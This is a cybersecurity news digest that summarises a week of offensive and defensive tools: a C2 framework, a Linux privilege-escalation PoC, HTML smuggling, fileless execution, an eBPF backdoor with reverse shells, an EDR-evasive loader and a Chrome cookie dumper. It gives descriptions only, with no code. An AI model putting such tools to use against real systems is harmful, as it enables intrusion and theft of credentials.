Last Week in Security (LWiS) - 2022-04-04

Shared section abuse (@BillDemirkapi), ISOs and office MOTW (@DidierStevens), better fuzzing harnesses (@h0mbre_), PoshC2 Linux ELF loader (@jdsnape), "Event pipes" for IPC (@x86matthew), Linux LPE (@pqlqpql), .soap webshells (@0xbad53c), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2022-03-28 to 2022-04-04.

News

Techniques and Write-ups

Tools and Exploits

  • Introducing PoshC2 v8.0. BOF compatibility, and a very slick Linux loader make version 8 worth checking out.
  • CVE-2022-1015 Local privilege escalation PoC for a bug in the nf_tables component of the linux kernel. More details here.
  • Smug_Fu3k is a HTML smuggling generator.
  • Introducing PacketStreamer: distributed packet capture for cloud-native platforms. tcpdump is perhaps my favorite debugging tool, but with the #distributed #microservices world we live in now, it can be hard to actually get packets from where you need them. PacketStreamer aims to be a universal packet forwarder to enable network visibility and debugging.
  • DDexec is a technique to run binaries filelessly and stealthily on Linux by tricking dd into pwning itself (reflective injection).
  • boopkit is a Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.
  • nim-loader is a WIP shellcode loader in nim with EDR evasion techniques.
  • Dump-Chrome-Cookies a modified version of CookieBro and scripts to leverage it to dump Chrome cookies. Check out the blog post for more info.

New to Me

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • Melody is a language that compiles to regular expressions and aims to be more easily readable and maintainable.
  • Rip Raw is a small tool to analyze the memory of compromised Linux systems.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.